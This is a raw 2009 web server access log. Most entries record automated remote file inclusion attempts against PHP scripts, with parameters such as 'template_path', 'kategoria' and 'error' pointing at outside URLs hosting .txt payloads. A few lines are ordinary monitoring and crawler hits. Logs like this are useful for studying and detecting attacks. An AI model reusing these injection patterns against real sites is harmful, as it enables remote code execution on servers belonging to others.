201.28.103.46 - - [19/May/2009:00:13:36 -0400] "GET /logs/access_log.Q108090100//templates/head.php?APB_SETTINGS[template_path]=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:00:14:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.64.49 - - [19/May/2009:00:15:50 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.51 - - [19/May/2009:00:15:53 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
77.221.151.178 - - [19/May/2009:00:16:01 -0400] "GET //galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
77.221.151.178 - - [19/May/2009:00:16:01 -0400] "GET /logs//galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.221.151.178 - - [19/May/2009:00:16:01 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.151.178 - - [19/May/2009:00:16:01 -0400] "GET /logs/access_log.Q108120600//galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.151.178 - - [19/May/2009:00:16:11 -0400] "GET //galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.151.178 - - [19/May/2009:00:16:11 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.151.178 - - [19/May/2009:00:16:11 -0400] "GET /logs//galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.151.178 - - [19/May/2009:00:16:11 -0400] "GET /logs/access_log.Q108120600//galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
202.177.22.67 - - [19/May/2009:00:16:26 -0400] "GET /logs/error_log.Q108081200//errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.177.22.67 - - [19/May/2009:00:16:27 -0400] "GET //errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
202.177.22.67 - - [19/May/2009:00:16:27 -0400] "GET /logs//errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
